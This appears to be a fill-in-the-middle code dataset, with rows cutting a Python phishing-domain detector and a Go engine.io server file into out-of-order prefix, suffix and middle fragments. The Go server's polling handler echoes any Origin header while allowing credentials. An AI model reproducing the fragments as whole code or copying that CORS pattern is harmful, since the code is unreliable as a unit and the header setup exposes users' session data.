We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs, we are going to generate all alternatives ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin character
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decice to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the lengh of the homoglyph here cause
# confusable_homoglyphs library nicely returns multi-character
# match as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
| if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
class FeaturesGenerator(Analyser):
'''
Generate features to detect outliers in the stream. In our case, the outliers is
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = []
Y_samples = []
for analyser in record['analysers']:
if analyser['analyser'] != 'WordSegmentation':
continue
for domain, segments in analyser['output'].items():
# Remove wildcard domain
domain = re.sub(r'^\*\.', '', domain)
parts = domain.split('.')
x = []
# Compute the number of domain parts
x.append(len(parts))
# Compute the length of the whole domain
x.append(len(domain))
longest = ''
# Compute the length of the longest domain parts
for part in parts:
if len(part) > len(longest):
longest = part
x.append(len(longest))
# Compute the length of the TLD
x.append(len(parts[-1]))
randomness_count = 0
# The nostril package which we are using to detect non-sense words
# in the domain only returns a boolean verdict so may be we need to
# think of how we want to quantify this
for w in segments:
try:
if len(w) >= FeaturesGenerator.NOSTRIL_LENGTH_LIMIT and nonsense(w):
randomness_count += 1
except ValueError:
continue
x.append(randomness_count / len(segments))
x_samples.append(x)
Y_samples.append(True if 'usual_suspect' in record else False)
break
record['analysers'].append({
'analyser': type(self).__name__,
'output': x_samples,
})
return record | def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
''' | random_line_split |
server.go | // Copyright (c) 2014, Markover Inc.
// Use of this source code is governed by the MIT
// license that can be found in the LICENSE file.
// Source code and contact info at http://github.com/poptip/ftc
package ftc
import (
"encoding/json"
"expvar"
"fmt"
"io"
"net/http"
"strings"
"time"
"code.google.com/p/go.net/websocket"
"github.com/golang/glog"
)
var numClients = expvar.NewInt("num_clients")
const (
// Protocol error codes and mappings.
errorTransportUnknown = 0
errorUnknownSID = 1
errorBadHandshakeMethod = 2
errorBadRequest = 3
// Query parameters used in client requests.
paramTransport = "transport"
paramSessionID = "sid"
// Available transports.
transportWebSocket = "websocket"
transportPolling = "polling"
// The default time before closed connections are cleaned from
// the client pool.
clientReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
| s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func handshakeData(c *conn) ([]byte, error) {
return json.Marshal(map[string]interface{}{
"pingInterval": 25000,
"pingTimeout": 60000,
"upgrades": getValidUpgrades(),
"sid": c.id,
})
}
// serverError sends a JSON-encoded message to the given io.Writer
// with the given error code.
func serverError(w io.Writer, code int) {
if rw, ok := w.(http.ResponseWriter); ok {
rw.Header().Set("Content-Type", "application/json")
rw.WriteHeader(http.StatusBadRequest)
}
msg := struct {
Code int `json:"code"`
Message string `json:"message"`
}{
Code: code,
Message: errorMessage[code],
}
if err := json.NewEncoder(w).Encode(msg); err != nil {
glog.Errorln("error encoding error msg %+v: %s", msg, err)
return
}
glog.Errorf("wrote server error: %+v", msg)
}
// setPollingHeaders sets the appropriate headers when responding
// to an XHR polling request.
func setPollingHeaders(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if len(origin) > 0 {
w.Header().Set("Access-Control-Allow-Credentials", "true")
} else {
origin = "*"
}
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Content-Type", "text/plain; charset=UTF-8")
}
| glog.Errorf("could not encode open payload: %v", err)
return
}
if | conditional_block |
server.go | // Copyright (c) 2014, Markover Inc.
// Use of this source code is governed by the MIT
// license that can be found in the LICENSE file.
// Source code and contact info at http://github.com/poptip/ftc
package ftc
import (
"encoding/json"
"expvar"
"fmt"
"io"
"net/http"
"strings"
"time"
"code.google.com/p/go.net/websocket"
"github.com/golang/glog"
)
var numClients = expvar.NewInt("num_clients")
const (
// Protocol error codes and mappings.
errorTransportUnknown = 0
errorUnknownSID = 1
errorBadHandshakeMethod = 2
errorBadRequest = 3
// Query parameters used in client requests.
paramTransport = "transport"
paramSessionID = "sid"
// Available transports.
transportWebSocket = "websocket"
transportPolling = "polling"
// The default time before closed connections are cleaned from
// the client pool.
clientReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
r | handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func handshakeData(c *conn) ([]byte, error) {
return json.Marshal(map[string]interface{}{
"pingInterval": 25000,
"pingTimeout": 60000,
"upgrades": getValidUpgrades(),
"sid": c.id,
})
}
// serverError sends a JSON-encoded message to the given io.Writer
// with the given error code.
func serverError(w io.Writer, code int) {
if rw, ok := w.(http.ResponseWriter); ok {
rw.Header().Set("Content-Type", "application/json")
rw.WriteHeader(http.StatusBadRequest)
}
msg := struct {
Code int `json:"code"`
Message string `json:"message"`
}{
Code: code,
Message: errorMessage[code],
}
if err := json.NewEncoder(w).Encode(msg); err != nil {
glog.Errorln("error encoding error msg %+v: %s", msg, err)
return
}
glog.Errorf("wrote server error: %+v", msg)
}
// setPollingHeaders sets the appropriate headers when responding
// to an XHR polling request.
func setPollingHeaders(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if len(origin) > 0 {
w.Header().Set("Access-Control-Allow-Credentials", "true")
} else {
origin = "*"
}
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Content-Type", "text/plain; charset=UTF-8")
}
| emoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// | identifier_body |
server.go | // Copyright (c) 2014, Markover Inc.
// Use of this source code is governed by the MIT
// license that can be found in the LICENSE file.
// Source code and contact info at http://github.com/poptip/ftc
package ftc
import (
"encoding/json"
"expvar"
"fmt"
"io"
"net/http"
"strings"
"time"
"code.google.com/p/go.net/websocket"
"github.com/golang/glog"
)
var numClients = expvar.NewInt("num_clients")
const (
// Protocol error codes and mappings.
errorTransportUnknown = 0
errorUnknownSID = 1
errorBadHandshakeMethod = 2
errorBadRequest = 3
// Query parameters used in client requests.
paramTransport = "transport"
paramSessionID = "sid"
// Available transports.
transportWebSocket = "websocket"
transportPolling = "polling"
// The default time before closed connections are cleaned from
// the client pool.
clientReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake. | // options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
c.Close()
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up, here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func handshakeData(c *conn) ([]byte, error) {
return json.Marshal(map[string]interface{}{
"pingInterval": 25000,
"pingTimeout": 60000,
"upgrades": getValidUpgrades(),
"sid": c.id,
})
}
// serverError sends a JSON-encoded message to the given io.Writer
// with the given error code.
func serverError(w io.Writer, code int) {
if rw, ok := w.(http.ResponseWriter); ok {
rw.Header().Set("Content-Type", "application/json")
rw.WriteHeader(http.StatusBadRequest)
}
msg := struct {
Code int `json:"code"`
Message string `json:"message"`
}{
Code: code,
Message: errorMessage[code],
}
if err := json.NewEncoder(w).Encode(msg); err != nil {
glog.Errorln("error encoding error msg %+v: %s", msg, err)
return
}
glog.Errorf("wrote server error: %+v", msg)
}
// setPollingHeaders sets the appropriate headers when responding
// to an XHR polling request.
func setPollingHeaders(w http.ResponseWriter, r *http.Request) {
origin := r.Header.Get("Origin")
if len(origin) > 0 {
w.Header().Set("Access-Control-Allow-Credentials", "true")
} else {
origin = "*"
}
w.Header().Set("Access-Control-Allow-Origin", origin)
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Content-Type", "text/plain; charset=UTF-8")
} | CookieName string
}
// NewServer allocates and returns a new server with the given | random_line_split |
server.go | // Copyright (c) 2014, Markover Inc.
// Use of this source code is governed by the MIT
// license that can be found in the LICENSE file.
// Source code and contact info at http://github.com/poptip/ftc
package ftc
import (
"encoding/json"
"expvar"
"fmt"
"io"
"net/http"
"strings"
"time"
"code.google.com/p/go.net/websocket"
"github.com/golang/glog"
)
var numClients = expvar.NewInt("num_clients")
const (
